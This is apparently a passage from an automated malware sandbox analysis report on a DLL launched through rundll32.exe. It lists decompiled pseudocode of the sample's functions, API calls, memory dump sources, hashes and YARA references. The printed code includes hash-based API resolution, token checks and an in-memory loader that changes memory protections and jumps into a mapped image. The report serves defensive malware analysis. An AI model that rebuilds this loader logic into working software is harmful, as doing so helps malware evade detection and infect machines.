Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction ID: a93f3b5615503a8656bc189412bc775d83fc80e4725b9d2ca077697ee6b81237
Opcode Fuzzy Hash: 452d68462d9db491265cc3f6ca4d221dd0685bf87e9696235c65e9b146e9e260
Instruction Fuzzy Hash: 19F0A4B52043096FE7609F5ACC54DB7BBEDEBD2B58F00892DA4D542640DA31AC108AB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C5E5C, Relevance: 1.5, APIs: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8C5E5C(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E8BC2C4(_t19) == 0) {
					_v12 = _a8;
					if(E6E8C303C(0x10154545, 0x73afd997) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E8C35C8(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x6e8c5e5f
0x6e8c5e61
0x6e8c5e6d
0x6e8c5e77
0x6e8c5e8d
0x6e8c5eac
0x6e8c5e8f
0x6e8c5ea0
0x6e8c5ea4
0x6e8c5ec4
0x6e8c5ea6
0x6e8c5ea6
0x6e8c5ea6
0x6e8c5ea4
0x6e8c5ead
0x6e8c5eb2
0x6e8c5ebb
0x6e8c5eb4
0x6e8c5eb4
0x6e8c5eb6
0x6e8c5eb6
0x6e8c5e6f
0x6e8c5e6f
0x6e8c5e6f
0x6e8c5ec1

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,10154545,73AFD997,?,?,?,6E8C5D51,00000000,?,00000000,?), ref: 6E8C5EA0

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction ID: 0e9e8f60c90951d2898ba0dec7a23e9829dda21972fb29d2773a9d02dbbc6b39
Opcode Fuzzy Hash: ff6b83ae53a14c7969036b25046835b6a8ee2cec4344305c903d2b4d1bdfae31
Instruction Fuzzy Hash: 02F04931248B07AFDF919BBDCC10AA777D9AF47644F008C29A9A5C6294EB31D4458653

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C1054, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E8C1054(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E8C3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E8C3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x8b9d0da3
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e8c1062
0x6e8c1064
0x6e8c1072
0x6e8c1076
0x6e8c10bf
0x00000000
0x6e8c10bf
0x6e8c107b
0x6e8c107c
0x6e8c107e
0x6e8c1083
0x00000000
0x6e8c109c
0x6e8c10a0
0x6e8c10ad
0x6e8c10b1
0x00000000
0x00000000
0x00000000
0x6e8c10ba

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,8B9D0DA3,00000004,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E8C10AD

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction ID: 2e7c01347859a68c89c9d7e587123a939991f396682643123807be55c240c500
Opcode Fuzzy Hash: 8e5cf5bb2e0746a9efef4d9230d436ccf5801192ed412a820cf8093eb6220fb6
Instruction Fuzzy Hash: 3BF06270344343ABEB4096A98C65F7B62EFABC2A44F00CC78B550CB594EE78CD499623

Uniqueness

Uniqueness Score: -1.00%

Function 6E8C3600, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E8C3600(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e8cd228 == 0x8c456a83) {
					_t7 = E6E8C303C(0xfe338407, 0x82fffbdc);
					 *0x6e8cd22c = E6E8C303C(0xfe338407, 0xc09bf2f8);
					if( *0x6e8cd228 == 0x8c456a83) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e8cd228 = 0;
					}
				}
				_t3 = E6E8C303C(0xfe338407, 0xdb278333);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e8cd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e8c3608
0x6e8c3610
0x6e8c3643
0x6e8c3654
0x6e8c365f
0x6e8c366a
0x6e8c366c
0x6e8c366c
0x6e8c365f
0x6e8c361c
0x6e8c3623
0x00000000
0x6e8c3625
0x6e8c3625
0x6e8c3626
0x6e8c3628
0x6e8c362a
0x6e8c362b
0x00000000
0x6e8c362b

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,FE338407,C09BF2F8,FE338407,82FFFBDC,?,?,00000000,6E8BDE41,?,?), ref: 6E8C366A

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: ee8efaa1ebec28a528f37f853cbcd05cdf6b68dbe88d650002c3a153a6906217
Instruction ID: e203cd820e2ccab1f064af28bb0673b8d6d8c698dcd32932c8d79b8320a7dcad
Opcode Fuzzy Hash: ee8efaa1ebec28a528f37f853cbcd05cdf6b68dbe88d650002c3a153a6906217
Instruction Fuzzy Hash: 4EF0E966184141BED2902BF69D0CD97F598D747B51B300CA9B584D27C0D921CC43A627

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E8B6D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8B6D50() {

				 *0x6e8cd280 = GetUserNameW;
				 *0x6E8CD284 = MessageBoxW;
				 *0x6E8CD288 = GetLastError;
				 *0x6E8CD28C = CreateFileA;
				 *0x6E8CD290 = DebugBreak;
				 *0x6E8CD294 = FlushFileBuffers;
				 *0x6E8CD298 = FreeEnvironmentStringsA;
				 *0x6E8CD29C = GetConsoleOutputCP;
				 *0x6E8CD2A0 = GetEnvironmentStrings;
				 *0x6E8CD2A4 = GetLocaleInfoA;
				 *0x6E8CD2A8 = GetStartupInfoA;
				 *0x6E8CD2AC = GetStringTypeA;
				 *0x6E8CD2B0 = HeapValidate;
				 *0x6E8CD2B4 = IsBadReadPtr;
				 *0x6E8CD2B8 = LCMapStringA;
				 *0x6E8CD2BC = LoadLibraryA;
				 *0x6E8CD2C0 = OutputDebugStringA;
				return 0x6e8cd280;
			}

0x6e8b6d61
0x6e8b6d69
0x6e8b6d6c
0x6e8b6d7b
0x6e8b6d7e
0x6e8b6d8d
0x6e8b6d90
0x6e8b6d9f
0x6e8b6da2
0x6e8b6db1
0x6e8b6db4
0x6e8b6dc3
0x6e8b6dc6
0x6e8b6dd5
0x6e8b6dd8
0x6e8b6de7
0x6e8b6dea
0x6e8b6ded

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b80622250a6ad74e214264eec5c6e9080c1ce82bd13791328b5bf64cce703050
Instruction ID: 9c76ca1165563d5b59134c91a320993177af7efcbc5f5fb8aae31dfbf9f18ea0
Opcode Fuzzy Hash: b80622250a6ad74e214264eec5c6e9080c1ce82bd13791328b5bf64cce703050
Instruction Fuzzy Hash: A411E3B8915A00CF8748CF06D1988517BF1BB8FB9035182DAD90E8B365D734D845DF94

Uniqueness

Uniqueness Score: -1.00%

Function 6E8BBB88, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E8BBB88(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E8BC2C4(__ecx);
				if(_t1 == 0) {
					_t2 = E6E8C303C(0xfe338407, 0x77fa1d17);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x6e8bbb89
0x6e8bbb8b
0x6e8bbb92
0x6e8bbb9e
0x6e8bbba5
0x6e8bbba7
0x6e8bbba9
0x6e8bbbaa
0x6e8bbbaa
0x6e8bbbab
0x00000000
0x6e8bbbab
0x6e8bbbb2

Memory Dump Source

Source File: 00000004.00000002.697384477.000000006E8B1000.00000020.00020000.sdmp, Offset: 6E8B0000, based on PE: true

Associated: 00000004.00000002.697379762.000000006E8B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.697397143.000000006E8CA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.698097060.000000006E8CD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.698746996.000000006E8CF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction ID: f1eae8902f232876c14ca94c9319c9b56521cbffd9115f6a4e3d4cf1bd306508
Opcode Fuzzy Hash: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction Fuzzy Hash: 66D01232104103AAEF6416E9EA50F5693688F82254F710C599840676DECF76C4124111

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6900 Parent PID: 5868 rundll32.exeCOMMON

Executed Functions

Function 033A2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E033A2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x33a4418 = 1;
				asm("movaps xmm0, [0x33a3010]");
				asm("movups [0x33a4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E033A26BF();
				E033A23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E033A26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E033A26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x33a4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x033a206e
0x033a207c
0x033a2083
0x033a2086
0x033a2090
0x033a2097
0x033a20a1
0x033a20a7
0x033a20b0
0x033a20b9
0x033a20bc
0x033a20c2
0x033a20c6
0x033a20ce
0x033a20d5
0x033a20d8
0x033a20db
0x033a20de
0x033a20e1
0x033a20fb
0x033a2101
0x033a2104
0x033a210c
0x033a2110
0x033a2113
0x033a2116
0x033a2119
0x033a211c
0x033a2138
0x033a2155
0x033a217a
0x033a217c
0x033a2185
0x033a2188
0x033a2192
0x033a2195
0x033a2198
0x033a219b
0x033a219e
0x033a236f
0x033a236f
0x033a22ce
0x033a22d4
0x033a21a9
0x033a21b7
0x033a21bf
0x033a21c2
0x033a21c4
0x033a21ca
0x033a21d6
0x033a21d9
0x033a21dc
0x033a21df
0x033a23b1
0x033a23b1
0x033a22ef
0x033a22f5
0x033a22fb
0x033a2301
0x033a2307
0x033a230d
0x033a2313
0x033a2316
0x033a2319
0x033a2321
0x033a2329
0x033a232f
0x033a2335
0x033a233b
0x033a2341
0x033a234f
0x033a22bb
0x033a22c1
0x033a22c1
0x033a22da
0x033a238e
0x033a2394
0x033a21ea
0x033a21ea
0x033a2204
0x033a2229
0x033a2238
0x033a223b
0x033a223f
0x033a2243
0x033a224a
0x033a2250
0x033a2252
0x033a225b
0x033a226c
0x033a2272
0x033a2278
0x033a227b
0x00000000
0x00000000
0x033a2281
0x00000000
0x033a21ea
0x033a22aa

APIs

VirtualProtect.KERNELBASE ref: 033A20E1
VirtualProtect.KERNELBASE ref: 033A217A

Strings

\, xrefs: 033A2321

Memory Dump Source

Source File: 00000009.00000002.720731505.00000000033A0000.00000040.00000010.sdmp, Offset: 033A0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: c77dd8abc952c155f8d1002d23538c5bf04e9a631d478c604a396956590bb98b
Instruction ID: 01b346693876791f618f5d1465e2158723c679fa03b360bc75de615f04e779d6
Opcode Fuzzy Hash: c77dd8abc952c155f8d1002d23538c5bf04e9a631d478c604a396956590bb98b
Instruction Fuzzy Hash: 8691ACB4E046188FDB04DFA9C580A9EFBF1FF48310F25856AE958AB351D334A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 033A21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 033A2250

Strings

\, xrefs: 033A2321

Memory Dump Source

Source File: 00000009.00000002.720731505.00000000033A0000.00000040.00000010.sdmp, Offset: 033A0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 98a072c8dab9426ccbb52670627202feb7ca80b7c6e95c90c27bf9a2d95576f6
Instruction ID: 4a2ea7d21f035193ddbb37fce2ccdd559351cf7c3aa57baf692d480619b40363
Opcode Fuzzy Hash: 98a072c8dab9426ccbb52670627202feb7ca80b7c6e95c90c27bf9a2d95576f6
Instruction Fuzzy Hash: 2B51BFB5E006298FCB14CF59C980A9DFBF1FF88310F6585A9D958A7311D730A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 033A1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 033A1F29

Memory Dump Source

Source File: 00000009.00000002.720731505.00000000033A0000.00000040.00000010.sdmp, Offset: 033A0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 3b174a937d04b2125cd1dbc80216c9435801d85e1881b7182a9b78fccf4ed77c
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: D541C3B5E046198FDB04DFA8C4946AEBBF1FF48310F19856DE848AB340D375A840CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 7144 Parent PID: 5868 rundll32.exeCOMMON

Executed Functions

Function 02992062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E02992062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x2994418 = 1;
				asm("movaps xmm0, [0x2993010]");
				asm("movups [0x2994428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E029926BF();
				E029923B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E029926BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E029926BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x2994418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x0299206e
0x0299207c
0x02992083
0x02992086
0x02992090
0x02992097
0x029920a1
0x029920a7
0x029920b0
0x029920b9
0x029920bc
0x029920c2
0x029920c6
0x029920ce
0x029920d5
0x029920d8
0x029920db
0x029920de
0x029920e1
0x029920fb
0x02992101
0x02992104
0x0299210c
0x02992110
0x02992113
0x02992116
0x02992119
0x0299211c
0x02992138
0x02992155
0x0299217a
0x0299217c
0x02992185
0x02992188
0x02992192
0x02992195
0x02992198
0x0299219b
0x0299219e
0x0299236f
0x0299236f
0x029922ce
0x029922d4
0x029921a9
0x029921b7
0x029921bf
0x029921c2
0x029921c4
0x029921ca
0x029921d6
0x029921d9
0x029921dc
0x029921df
0x029923b1
0x029923b1
0x029922ef
0x029922f5
0x029922fb
0x02992301
0x02992307
0x0299230d
0x02992313
0x02992316
0x02992319
0x02992321
0x02992329
0x0299232f
0x02992335
0x0299233b
0x02992341
0x0299234f
0x029922bb
0x029922c1
0x029922c1
0x029922da
0x0299238e
0x02992394
0x029921ea
0x029921ea
0x02992204
0x02992229
0x02992238
0x0299223b
0x0299223f
0x02992243
0x0299224a
0x02992250
0x02992252
0x0299225b
0x0299226c
0x02992272
0x02992278
0x0299227b
0x00000000
0x00000000
0x02992281
0x00000000
0x029921ea
0x029922aa

APIs

VirtualProtect.KERNELBASE ref: 029920E1
VirtualProtect.KERNELBASE ref: 0299217A

Strings

\, xrefs: 02992321

Memory Dump Source

Source File: 0000000B.00000002.712675726.0000000002990000.00000040.00000010.sdmp, Offset: 02990000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: fb40292e0429194bb38210f2f913f21f38b4b02b41421251eec9b35b910b6aa5
Instruction ID: 451cfa513fa7826b26d6705621c4669c6d8f528113186250abadf77c3257affd
Opcode Fuzzy Hash: fb40292e0429194bb38210f2f913f21f38b4b02b41421251eec9b35b910b6aa5
Instruction Fuzzy Hash: BB91BDB4E042189FDB14CFA9C580AADFBF1FF88314F15846AE958AB351D334A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 029921EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 02992250

Strings

\, xrefs: 02992321

Memory Dump Source

Source File: 0000000B.00000002.712675726.0000000002990000.00000040.00000010.sdmp, Offset: 02990000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 70ecf9c70ad69d1300de84519b7998816a5348f4050a30dd7d0e6f2c45958979
Instruction ID: 5d7639fe926246ad05fa0782b35be4628b75637e46f83921c9422463eb350b22
Opcode Fuzzy Hash: 70ecf9c70ad69d1300de84519b7998816a5348f4050a30dd7d0e6f2c45958979
Instruction Fuzzy Hash: 5C51CEB5E006298FCB24CF59C980A9DFBF1BF88314F2585AAD958A7311D730AD91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02991E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 02991F29

Memory Dump Source

Source File: 0000000B.00000002.712675726.0000000002990000.00000040.00000010.sdmp, Offset: 02990000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
